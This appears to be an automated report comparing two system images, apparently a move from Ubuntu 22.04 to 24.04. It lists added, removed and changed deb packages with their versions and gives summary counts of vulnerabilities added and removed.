
[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

➖	libpcl-keypoints1.12	1.12.1+dfsg-3build1
➕	libpcl-keypoints1.14		1.14.0+dfsg-1
➖	libpcl-ml1.12	1.12.1+dfsg-3build1
➕	libpcl-ml1.14		1.14.0+dfsg-1
➖	libpcl-octree1.12	1.12.1+dfsg-3build1
➕	libpcl-octree1.14		1.14.0+dfsg-1
➖	libpcl-outofcore1.12	1.12.1+dfsg-3build1
➕	libpcl-outofcore1.14		1.14.0+dfsg-1
➖	libpcl-people1.12	1.12.1+dfsg-3build1
➕	libpcl-people1.14		1.14.0+dfsg-1
➖	libpcl-recognition1.12	1.12.1+dfsg-3build1
➕	libpcl-recognition1.14		1.14.0+dfsg-1
➖	libpcl-registration1.12	1.12.1+dfsg-3build1
➕	libpcl-registration1.14		1.14.0+dfsg-1
➖	libpcl-sample-consensus1.12	1.12.1+dfsg-3build1
➕	libpcl-sample-consensus1.14		1.14.0+dfsg-1
➖	libpcl-search1.12	1.12.1+dfsg-3build1
➕	libpcl-search1.14		1.14.0+dfsg-1
➖	libpcl-segmentation1.12	1.12.1+dfsg-3build1
➕	libpcl-segmentation1.14		1.14.0+dfsg-1
➖	libpcl-stereo1.12	1.12.1+dfsg-3build1
➕	libpcl-stereo1.14		1.14.0+dfsg-1
➖	libpcl-surface1.12	1.12.1+dfsg-3build1
➕	libpcl-surface1.14		1.14.0+dfsg-1
➖	libpcl-tracking1.12	1.12.1+dfsg-3build1
➕	libpcl-tracking1.14		1.14.0+dfsg-1
➖	libpcl-visualization1.12	1.12.1+dfsg-3build1
➕	libpcl-visualization1.14		1.14.0+dfsg-1
➖	libpcre16-3	2:8.39-13ubuntu0.22.04.1
♾️	libpcre2-16-0	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-32-0	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-8-0	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-dev	10.39-3ubuntu0.1	10.42-4ubuntu2.1
♾️	libpcre2-posix3	10.39-3ubuntu0.1	10.42-4ubuntu2.1
➖	libpcre3	2:8.39-13ubuntu0.22.04.1
➖	libpcre3-dev	2:8.39-13ubuntu0.22.04.1
➖	libpcre32-3	2:8.39-13ubuntu0.22.04.1
➖	libpcrecpp0v5	2:8.39-13ubuntu0.22.04.1
♾️	libpcsclite1	1.9.5-3ubuntu1	2.0.3-1build1
➖	libperl5.34	5.34.0-3ubuntu1.5
➕	libperl5.38t64		5.38.2-3.2ubuntu0.2
♾️	libperlio-gzip-perl	0.19-1build8	0.20-1build4
➖	libpgm-5.3-0	5.3.128~dfsg-2
➕	libpgm-5.3-0t64		5.3.128~dfsg-2.1build1
♾️	libpgm-dev	5.3.128~dfsg-2	5.3.128~dfsg-2.1build1
➕	libpipewire-0.3-0t64		1.0.5-1ubuntu3.2
♾️	libpixman-1-0	0.40.0-1ubuntu0.22.04.1	0.42.2-1build1
➕	libpixman-1-dev		0.42.2-1build1
➕	libpkgconf3		1.8.1-2build1
➕	libplacebo338		6.338.2-2build1
♾️	libpmix-dev	4.1.2-2ubuntu1	5.0.1-4.1build1
➖	libpmix2	4.1.2-2ubuntu1
➕	libpmix2t64		5.0.1-4.1build1
♾️	libpng-dev	1.6.37-3ubuntu0.1	1.6.43-5ubuntu0.5
➖	libpng16-16	1.6.37-3ubuntu0.1
		Removed vulnerabilities (4):
➕	libpng16-16t64		1.6.43-5ubuntu0.5
♾️	libpocketsphinx3	0.8.0+real5prealpha+1-14ubuntu1	0.8.0+real5prealpha+1-15ubuntu5
♾️	libpolkit-agent-1-0	0.105-33	124-2ubuntu1.24.04.2
♾️	libpolkit-gobject-1-0	0.105-33	124-2ubuntu1.24.04.2
♾️	libpoppler-dev	22.02.0-2ubuntu0.12	24.02.0-1ubuntu9.8
♾️	libpoppler-private-dev	22.02.0-2ubuntu0.12	24.02.0-1ubuntu9.8
➖	libpoppler118	22.02.0-2ubuntu0.12
➕	libpoppler134		24.02.0-1ubuntu9.8
➕	libpopt0		1.19+dfsg-1build1
♾️	libportmidi-dev	1:217-6	1:217-6.1build3
♾️	libportmidi0	1:217-6	1:217-6.1build3
♾️	libpostproc-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libpostproc55	7:4.4.2-0ubuntu0.22.04.1
➕	libpostproc57		7:6.1.1-3ubuntu5
♾️	libpq-dev	14.20-0ubuntu0.22.04.1	16.11-0ubuntu0.24.04.1
♾️	libpq5	14.20-0ubuntu0.22.04.1	16.11-0ubuntu0.24.04.1
➕	libproc2-0		2:4.0.4-4ubuntu3.2
➖	libprocps8	2:3.3.17-6ubuntu2.1
♾️	libproj-dev	8.2.1-1	9.4.0-1build2
➖	libproj22	8.2.1-1
➕	libproj25		9.4.0-1build2
♾️	libprotobuf-dev	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
➖	libprotobuf-lite23	3.12.4-1ubuntu7.22.04.4
➕	libprotobuf-lite32t64		3.21.12-8.2ubuntu0.2
➖	libprotobuf23	3.12.4-1ubuntu7.22.04.4
➕	libprotobuf32t64		3.21.12-8.2ubuntu0.2
♾️	libprotoc-dev	3.12.4-1ubuntu7.22.04.4	3.21.12-8.2ubuntu0.2
➖	libprotoc23	3.12.4-1ubuntu7.22.04.4
➕	libprotoc32t64		3.21.12-8.2ubuntu0.2
♾️	libproxy1v5	0.4.17-2	0.5.4-4build1
➖	libpsl5	0.21.0-1.2build2
➕	libpsl5t64		0.21.2-1.1build1
♾️	libpthread-stubs0-dev	0.4-1build2	0.4-1build3
➕	libpugixml-dev		1.14-0.1build1
➕	libpugixml1v5		1.14-0.1build1
♾️	libpulse-dev	1:15.99.1+dfsg1-1ubuntu2.2	1:16.1+dfsg1-2ubuntu10.1
♾️	libpulse-mainloop-glib0	1:15.99.1+dfsg1-1ubuntu2.2	1:16.1+dfsg1-2ubuntu10.1
♾️	libpulse0	1:15.99.1+dfsg1-1ubuntu2.2	1:16.1+dfsg1-2ubuntu10.1
♾️	libpyside2-dev	5.15.2-2build2	5.15.13-1
➖	libpyside2-py3-5.15	5.15.2-2build2
➕	libpyside2-py3-5.15t64		5.15.13-1
♾️	libpython3-dev	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
♾️	libpython3-stdlib	3.10.6-1~22.04.1	3.12.3-0ubuntu2.1
➖	libpython3.10	3.10.12-1~22.04.12
➖	libpython3.10-dev	3.10.12-1~22.04.12
➖	libpython3.10-minimal	3.10.12-1~22.04.12
➖	libpython3.10-stdlib	3.10.12-1~22.04.12
➕	libpython3.12-dev		3.12.3-1ubuntu0.11
➕	libpython3.12-minimal		3.12.3-1ubuntu0.11
➕	libpython3.12-stdlib		3.12.3-1ubuntu0.11
➕	libpython3.12t64		3.12.3-1ubuntu0.11
♾️	libqhull-dev	2020.2-4	2020.2-6build1
♾️	libqhull-r8.0	2020.2-4	2020.2-6build1
♾️	libqhull8.0	2020.2-4	2020.2-6build1
♾️	libqhullcpp8.0	2020.2-4	2020.2-6build1
♾️	libqrencode4	4.1.1-1	4.1.1-1build2
♾️	libqt5charts5	5.15.3-1	5.15.13-1
➖	libqt5concurrent5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5concurrent5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5core5a	5.15.3+dfsg-2ubuntu0.2
➕	libqt5core5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5dbus5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5dbus5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5designer5	5.15.3-1	5.15.13-1
♾️	libqt5designercomponents5	5.15.3-1	5.15.13-1
➖	libqt5gui5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5gui5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5help5	5.15.3-1	5.15.13-1
➖	libqt5network5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5network5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5opengl5	5.15.3+dfsg-2ubuntu0.2
♾️	libqt5opengl5-dev	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
➕	libqt5opengl5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5positioning5	5.15.3+dfsg-3	5.15.13+dfsg-1
➖	libqt5printsupport5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5printsupport5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5qml5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5qmlmodels5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5qmlworkerscript5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quick5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quickcontrols2-5	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	libqt5quickparticles5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quickshapes5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quicktemplates2-5	5.15.3+dfsg-1	5.15.13+dfsg-1
♾️	libqt5quicktest5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5quickwidgets5	5.15.3+dfsg-1	5.15.13+dfsg-1ubuntu0.1
♾️	libqt5sensors5	5.15.3-1	5.15.13-1
➖	libqt5sql5	5.15.3+dfsg-2ubuntu0.2
♾️	libqt5sql5-sqlite	5.15.3+dfsg-2ubuntu0.2	5.15.13+dfsg-1ubuntu1
➕	libqt5sql5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5svg5	5.15.3-1	5.15.13-1
➖	libqt5test5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5test5t64		5.15.13+dfsg-1ubuntu1
♾️	libqt5webchannel5	5.15.3-1	5.15.13-1
♾️	libqt5webkit5	5.212.0~alpha4-15ubuntu1	5.212.0~alpha4-36
♾️	libqt5webkit5-dev	5.212.0~alpha4-15ubuntu1	5.212.0~alpha4-36
➖	libqt5widgets5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5widgets5t64		5.15.13+dfsg-1ubuntu1
➖	libqt5xml5	5.15.3+dfsg-2ubuntu0.2
➕	libqt5xml5t64		5.15.13+dfsg-1ubuntu1
♾️	librabbitmq4	0.10.0-1ubuntu2	0.11.0-1build2
➕	libraptor2-0		2.0.16-3ubuntu0.1
♾️	libraqm0	0.7.0-4ubuntu1	0.10.1-1build1
➕	librav1e0		0.7.1-2
♾️	libraw1394-11	2.1.2-2build2	2.1.2-2build3
♾️	libraw1394-dev	2.1.2-2build2	2.1.2-2build3
➖	libraw20	0.20.2-2ubuntu2.22.04.2
➕	libraw23t64		0.21.2-2.1ubuntu0.24.04.1
➖	librdmacm1	39.0-1
➕	librdmacm1t64		50.0-2ubuntu0.2
➖	libreadline8	8.1.2-1
➕	libreadline8t64		8.2-4build1
♾️	librhash0	1.4.2-1ubuntu1	1.4.3-3build1
➕	librist4		0.2.10+dfsg-2
➕	librole-tiny-perl		2.002004-1
♾️	librsvg2-2	2.52.5+dfsg-3ubuntu0.2	2.58.0+dfsg-1build1
♾️	librtmp1	2.4+20151223.gitfa8646d.1-2build4	2.4+20151223.gitfa8646d.1-2build7
♾️	librttopo-dev	1.1.0-2	1.1.0-3build2
♾️	librttopo1	1.1.0-2	1.1.0-3build2
♾️	librubberband2	2.0.0-2	3.3.0+dfsg-2build1
➕	libruby		1:3.2~ubuntu1
➖	libruby3.0	3.0.2-7ubuntu2.11
➕	libruby3.2		3.2.3-1ubuntu0.24.04.6
♾️	libsamplerate0	0.2.2-1build1	0.2.2-4build1
➕	libsamplerate0-dev		0.2.2-4build1
♾️	libsasl2-2	2.1.27+dfsg2-3ubuntu1.2	2.1.28+dfsg1-5ubuntu3.1
♾️	libsasl2-modules-db	2.1.27+dfsg2-3ubuntu1.2	2.1.28+dfsg1-5ubuntu3.1
♾️	libsbc1	1.5-3build2	2.0-1build1
♾️	libsdformat14	14.8.0-1~jammy	14.8.0-1~noble
♾️	libsdformat14-dev	14.8.0-1~jammy	14.8.0-1~noble
♾️	libsdl-image1.2	1.2.12-13build1	1.2.12-13build4
♾️	libsdl-image1.2-dev	1.2.12-13build1	1.2.12-13build4
♾️	libsdl-mixer1.2	1.2.12-17build1	1.2.12-18
♾️	libsdl-mixer1.2-dev	1.2.12-17build1	1.2.12-18
♾️	libsdl1.2-dev	1.2.15+dfsg2-6	1.2.68-2
♾️	libsdl1.2debian	1.2.15+dfsg2-6	1.2.68-2
♾️	libsdl2-2.0-0	2.0.20+dfsg-2ubuntu1.22.04.1	2.30.0+dfsg-1ubuntu3.1
♾️	libsdl2-dev	2.0.20+dfsg-2ubuntu1.22.04.1	2.30.0+dfsg-1ubuntu3.1
♾️	libseccomp2	2.5.3-2ubuntu3~22.04.1	2.5.5-1ubuntu3.1
♾️	libselinux1	3.3-1build2	3.5-2ubuntu2.1
♾️	libselinux1-dev	3.3-1build2	3.5-2ubuntu2.1
♾️	libsemanage-common	3.3-1build2	3.5-1build5
♾️	libsemanage2	3.3-1build2	3.5-1build5
♾️	libsensors-config	1:3.6.0-7ubuntu1	1:3.6.0-9build1
♾️	libsensors5	1:3.6.0-7ubuntu1	1:3.6.0-9build1
♾️	libsepol-dev	3.3-1build1	3.5-2build1
♾️	libsepol2	3.3-1build1	3.5-2build1
♾️	libserd-0-0	0.30.10-2	0.32.2-1
➕	libserf-1-1		1.3.10-1ubuntu0.24.04.1
➖	libsfml-audio2.5	2.5.1+dfsg-2
➕	libsfml-audio2.6		2.6.1+dfsg-2build2
♾️	libsfml-dev	2.5.1+dfsg-2	2.6.1+dfsg-2build2
➖	libsfml-graphics2.5	2.5.1+dfsg-2
➕	libsfml-graphics2.6		2.6.1+dfsg-2build2
➖	libsfml-network2.5	2.5.1+dfsg-2
➕	libsfml-network2.6		2.6.1+dfsg-2build2
➖	libsfml-system2.5	2.5.1+dfsg-2
➕	libsfml-system2.6		2.6.1+dfsg-2build2
➖	libsfml-window2.5	2.5.1+dfsg-2
➕	libsfml-window2.6		2.6.1+dfsg-2build2
➕	libsframe1		2.42-4ubuntu2.8
➕	libsharpyuv-dev		1.3.2-0.4build3
➕	libsharpyuv0		1.3.2-0.4build3
♾️	libshiboken2-dev	5.15.2-2build2	5.15.13-1
➖	libshiboken2-py3-5.15	5.15.2-2build2
➕	libshiboken2-py3-5.15t64		5.15.13-1
♾️	libshine3	3.1.1-2	3.1.1-2build1
♾️	libshout3	2.4.5-1build3	2.4.6-1build2
♾️	libsigsegv2	2.13-1ubuntu3	2.14-1ubuntu2
♾️	libslang2	2.3.2-5build4	2.3.3-3build2
➖	libslang2-dev	2.3.2-5build4
♾️	libsm-dev	2:1.2.3-1build2	2:1.2.3-1build3
♾️	libsm6	2:1.2.3-1build2	2:1.2.3-1build3
♾️	libsmartcols1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	libsnappy1v5	1.1.8-1build3	1.1.10-1build1
♾️	libsndfile1	1.0.31-2ubuntu0.2	1.2.2-1ubuntu5.24.04.1
♾️	libsndio-dev	1.8.1-1.1	1.9.0-0.3build3
♾️	libsndio7.0	1.8.1-1.1	1.9.0-0.3build3
♾️	libsocket++1	1.12.13+git20131030.5d039ba-1	1.12.13+git20131030.5d039ba-1build1
♾️	libsodium-dev	1.0.18-1build2	1.0.18-1ubuntu0.24.04.1
♾️	libsodium23	1.0.18-1build2	1.0.18-1ubuntu0.24.04.1
		Removed vulnerabilities (1):
♾️	libsord-0-0	0.16.8-2	0.16.16-2build1
♾️	libsoundtouch1	2.3.1+ds1-1	2.3.2+ds1-1build1
➕	libsoup-3.0-0		3.4.4-5ubuntu0.7
➕	libsoup-3.0-common		3.4.4-5ubuntu0.7
➖	libsoup2.4-1	2.74.2-3ubuntu0.6
➖	libsoup2.4-common	2.74.2-3ubuntu0.6
♾️	libsoxr0	0.1.3-4build2	0.1.3-4build3
➕	libspa-0.2-modules		1.0.5-1ubuntu3.2
➖	libspandsp2	0.0.6+dfsg-2
➕	libspandsp2t64		0.0.6+dfsg-2.1build1
♾️	libspatialite-dev	5.0.1-2build2	5.1.0-3build1
➖	libspatialite7	5.0.1-2build2
➕	libspatialite8t64		5.1.0-3build1
♾️	libspdlog-dev	1:1.9.2+ds-0.2	1:1.12.0+ds-2build1
➖	libspdlog1	1:1.9.2+ds-0.2
➕	libspdlog1.12		1:1.12.0+ds-2build1
➕	libspecio-perl		0.48-1
♾️	libspeex1	1.2~rc1.2-1.1ubuntu3	1.2.1-2ubuntu2.24.04.1
➖	libsphinxbase3	0.8+5prealpha+1-13build1
➕	libsphinxbase3t64		0.8+5prealpha+1-17build2
♾️	libsqlite3-0	3.37.2-2ubuntu0.5	3.45.1-1ubuntu2.5
♾️	libsqlite3-dev	3.37.2-2ubuntu0.5	3.45.1-1ubuntu2.5
♾️	libsratom-0-0	0.6.8-1	0.6.16-1build1
➖	libsrt1.4-gnutls	1.4.4-4
➕	libsrt1.5-gnutls		1.5.3-1build2
♾️	libsrtp2-1	2.4.2-2	2.5.0-3build1
♾️	libss2	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
♾️	libssh-4	0.9.6-2ubuntu0.22.04.5	0.10.6-2ubuntu0.3
♾️	libssh-gcrypt-4	0.9.6-2ubuntu0.22.04.5	0.10.6-2ubuntu0.3
		Removed vulnerabilities (6):
♾️	libssl-dev	3.0.2-0ubuntu1.20	3.0.13-0ubuntu3.7
➖	libssl3	3.0.2-0ubuntu1.20
➕	libssl3t64		3.0.13-0ubuntu3.7
➕	libstb0t64		0.0~git20230129.5736b15+ds-1.2
➖	libstdc++-11-dev	11.4.0-1ubuntu1~22.04.2
➖	libstdc++-11-dev-armhf-cross	11.4.0-1ubuntu1~22.04cross1
➕	libstdc++-13-dev		13.3.0-6ubuntu2~24.04.1
➕	libstdc++-13-dev-armhf-cross		13.3.0-6ubuntu2~24.04cross1
♾️	libstdc++6	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libstdc++6-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libstemmer0d	2.2.0-1build1	2.2.0-4build1
➕	libsub-exporter-perl		0.990-1
➕	libsub-exporter-progressive-perl		0.001013-3
➕	libsub-identify-perl		0.14-3build3
➕	libsub-install-perl		0.929-1
➕	libsub-name-perl		0.27-1build3
➕	libsub-quote-perl		2.006008-1ubuntu1
♾️	libsuperlu-dev	5.3.0+dfsg1-2	6.0.1+dfsg1-1build1
➖	libsuperlu5	5.3.0+dfsg1-2
➕	libsuperlu6		6.0.1+dfsg1-1build1
➕	libsvn1		1.14.3-1build4
➕	libsvtav1enc1d1		1.7.0+dfsg-2build1
♾️	libswresample-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libswresample3	7:4.4.2-0ubuntu0.22.04.1
➕	libswresample4		7:6.1.1-3ubuntu5
♾️	libswscale-dev	7:4.4.2-0ubuntu0.22.04.1	7:6.1.1-3ubuntu5
➖	libswscale5	7:4.4.2-0ubuntu0.22.04.1
➕	libswscale7		7:6.1.1-3ubuntu5
➕	libsystemd-shared		255.4-1ubuntu8.12
♾️	libsystemd0	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libsz2	1.0.6-1	1.1.2-1build1
♾️	libtag1v5	1.11.1+dfsg.1-3ubuntu3	1.13.1-1build1
♾️	libtag1v5-vanilla	1.11.1+dfsg.1-3ubuntu3	1.13.1-1build1
♾️	libtasn1-6	4.18.0-4ubuntu0.1	4.19.0-3ubuntu0.24.04.2
		Removed vulnerabilities (2):
♾️	libtbb-dev	2021.5.0-7ubuntu2	2021.11.0-2ubuntu2
♾️	libtbb12	2021.5.0-7ubuntu2	2021.11.0-2ubuntu2

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

➖	libtbb2	2020.3-1ubuntu3
➕	libtbbbind-2-5		2021.11.0-2ubuntu2
♾️	libtbbmalloc2	2021.5.0-7ubuntu2	2021.11.0-2ubuntu2
♾️	libtcl8.6	8.6.12+dfsg-1build1	8.6.14+dfsg-1build1
➖	libtesseract4	4.1.1-2.1build1
➕	libtesseract5		5.3.4-1build5
♾️	libthai-data	0.1.29-1build1	0.1.29-2build1
➕	libthai-dev		0.1.29-2build1
♾️	libthai0	0.1.29-1build1	0.1.29-2build1
♾️	libtheora-dev	1.1.1+dfsg.1-15ubuntu4	1.1.1+dfsg.1-16.1build3
♾️	libtheora0	1.1.1+dfsg.1-15ubuntu4	1.1.1+dfsg.1-16.1build3
♾️	libtiff-dev	4.3.0-6ubuntu0.12	4.5.1+git230720-4ubuntu2.4
➖	libtiff5	4.3.0-6ubuntu0.12
➕	libtiff6		4.5.1+git230720-4ubuntu2.4
➖	libtiffxx5	4.3.0-6ubuntu0.12
➕	libtiffxx6		4.5.1+git230720-4ubuntu2.4
➕	libtimedate-perl		2.3300-2
♾️	libtinfo6	6.3-2ubuntu0.1	6.4+20240113-1ubuntu2
➖	libtinyxml-dev	2.6.2-6ubuntu0.22.04.1
➕	libtinyxml2-10		10.0.0+dfsg-2
➖	libtinyxml2-9	9.0.0+dfsg-3
♾️	libtinyxml2-dev	9.0.0+dfsg-3	10.0.0+dfsg-2
♾️	libtinyxml2.6.2v5	2.6.2-6ubuntu0.22.04.1	2.6.2-6.1
♾️	libtirpc-common	1.3.2-2ubuntu0.1	1.3.4+ds-1.1build1
♾️	libtirpc-dev	1.3.2-2ubuntu0.1	1.3.4+ds-1.1build1
➖	libtirpc3	1.3.2-2ubuntu0.1
➕	libtirpc3t64		1.3.4+ds-1.1build1
♾️	libtk8.6	8.6.12-1build1	8.6.14-1build1
♾️	libtool	2.4.6-15build2	2.4.7-7build1
♾️	libtool-bin	2.4.6-15build2	2.4.7-7build1
➕	libtry-tiny-perl		0.31-2
➖	libtsan0	11.4.0-1ubuntu1~22.04.2
➕	libtsan2		14.2.0-4ubuntu2~24.04.1
♾️	libturbojpeg	2.1.2-0ubuntu1	1:2.1.5-2ubuntu2
♾️	libtwolame0	0.4.0-2build2	0.4.0-2build3
♾️	libubsan1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libubsan1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libucx0	1.12.1~rc2-1	1.16.0+ds-5ubuntu1
♾️	libudev-dev	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libudev1	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	libudfread0	1.1.2-1	1.1.2-1build1
➕	libunibreak5		5.1-2build1
➖	libunistring2	1.0-1
➕	libunistring5		1.1-2build1.1
♾️	libunwind-dev	1.3.2-2build2.1	1.6.2-3build1.1
♾️	libunwind8	1.3.2-2build2.1	1.6.2-3build1.1
➕	liburcu-dev		0.14.0-3.1build1
➕	liburcu8t64		0.14.0-3.1build1
♾️	liburiparser-dev	0.9.6+dfsg-1	0.9.7+dfsg-2build1
♾️	liburiparser1	0.9.6+dfsg-1	0.9.7+dfsg-2build1
♾️	libusb-1.0-0	2:1.0.25-1ubuntu2	2:1.0.27-1
♾️	libusb-1.0-0-dev	2:1.0.25-1ubuntu2	2:1.0.27-1
♾️	libutempter0	1.2.1-2build2	1.2.1-3build1
➕	libutf8proc3		2.9.0-1build1
♾️	libutfcpp-dev	3.2.1-2	3.2.5+really3.2.4-1
♾️	libuuid1	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
➖	libuv1	1.43.0-1ubuntu0.1
♾️	libuv1-dev	1.43.0-1ubuntu0.1	1.48.0-1.1build1
➕	libuv1t64		1.48.0-1.1build1
➖	libv4l-0	1.22.1-2build1
➕	libv4l-0t64		1.26.1-4build3
➖	libv4lconvert0	1.22.1-2build1
➕	libv4lconvert0t64		1.26.1-4build3
♾️	libva-drm2	2.14.0-1	2.20.0-2ubuntu0.1
♾️	libva-x11-2	2.14.0-1	2.20.0-2ubuntu0.1
♾️	libva2	2.14.0-1	2.20.0-2ubuntu0.1
➕	libvariable-magic-perl		0.63-1build3
♾️	libvdpau1	1.4-3build2	1.5-2build1
♾️	libvidstab1.1	1.1.0-2	1.1.0-2build1
♾️	libvisual-0.4-0	0.4.0-17build2	0.4.2-2build1
♾️	libvo-aacenc0	0.1.3-2	0.1.3-2build1
♾️	libvo-amrwbenc0	0.1.3-2	0.1.3-2build1
♾️	libvorbis-dev	1.3.7-1build2	1.3.7-1build3
♾️	libvorbis0a	1.3.7-1build2	1.3.7-1build3
♾️	libvorbisenc2	1.3.7-1build2	1.3.7-1build3
♾️	libvorbisfile3	1.3.7-1build2	1.3.7-1build3
➖	libvpx7	1.11.0-2ubuntu2.4
		Removed vulnerabilities (1):
➕	libvpx9		1.14.0-1ubuntu2.3
♾️	libvtk9-dev	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
♾️	libvtk9-java	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
♾️	libvtk9-qt-dev	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
➖	libvtk9.1	9.1.0+really9.1.0+dfsg2-3build1
➖	libvtk9.1-qt	9.1.0+really9.1.0+dfsg2-3build1
➕	libvtk9.1t64		9.1.0+really9.1.0+dfsg2-7.1build3
➕	libvtk9.1t64-qt		9.1.0+really9.1.0+dfsg2-7.1build3
♾️	libvulkan-dev	1.3.204.1-2	1.3.275.0-1build1
♾️	libvulkan1	1.3.204.1-2	1.3.275.0-1build1
♾️	libwacom-common	2.2.0-1	2.10.0-2
♾️	libwacom9	2.2.0-1	2.10.0-2
♾️	libwavpack1	5.4.0-1build2	5.6.0-1build1
♾️	libwayland-bin	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-client0	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-cursor0	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-dev	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-egl1	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwayland-server0	1.20.0-1ubuntu0.1	1.22.0-2.1build1
♾️	libwebp-dev	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
♾️	libwebp7	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
➕	libwebpdecoder3		1.3.2-0.4build3
♾️	libwebpdemux2	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
♾️	libwebpmux3	1.2.2-2ubuntu0.22.04.2	1.3.2-0.4build3
♾️	libwebrtc-audio-processing1	0.3.1-0ubuntu5	0.3.1-0ubuntu6
♾️	libwebsockets-dev	4.0.20-2ubuntu1	4.3.3-1.1build3
➕	libwebsockets-evlib-ev		4.3.3-1.1build3
➕	libwebsockets-evlib-glib		4.3.3-1.1build3
➕	libwebsockets-evlib-uv		4.3.3-1.1build3
➖	libwebsockets16	4.0.20-2ubuntu1
		Removed vulnerabilities (2):
➕	libwebsockets19t64		4.3.3-1.1build3
♾️	libwildmidi2	0.4.3-1	0.4.3-1build3
♾️	libwoff1	1.0.2-1build4	1.0.2-2build1
➖	libwxbase3.0-0v5	3.0.5.1+dfsg-4
➕	libwxbase3.2-1t64		3.2.4+dfsg-4build1
➕	libwxgtk-gl3.2-1t64		3.2.4+dfsg-4build1
➖	libwxgtk3.0-gtk3-0v5	3.0.5.1+dfsg-4
➕	libwxgtk3.2-1t64		3.2.4+dfsg-4build1
➕	libwxgtk3.2-dev		3.2.4+dfsg-4build1
♾️	libx11-6	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-data	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-dev	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-xcb-dev	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
♾️	libx11-xcb1	2:1.7.5-1ubuntu0.3	2:1.8.7-1build1
➖	libx264-163	2:0.163.3060+git5db6aa6-2build1
➕	libx264-164		2:0.164.3108+git31e19f9-1
♾️	libx265-199	3.5-2	3.5-2build1
♾️	libx265-dev	3.5-2	3.5-2build1
♾️	libxau-dev	1:1.0.9-1build5	1:1.0.9-1build6
♾️	libxau6	1:1.0.9-1build5	1:1.0.9-1build6
♾️	libxaw7	2:1.0.14-1	2:1.0.14-1build2
♾️	libxaw7-dev	2:1.0.14-1	2:1.0.14-1build2
➖	libxcb-dri2-0	1.14-3ubuntu3
♾️	libxcb-dri3-0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-glx0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-icccm4	0.4.1-1.1build2	0.4.1-1.1build3
♾️	libxcb-image0	0.4.0-2	0.4.0-2build1
♾️	libxcb-keysyms1	0.4.0-1build3	0.4.0-1build4
♾️	libxcb-present0	1.14-3ubuntu3	1.15-1ubuntu2
♾️	libxcb-randr0	1.14-3ubuntu3	1.15-1ubuntu2
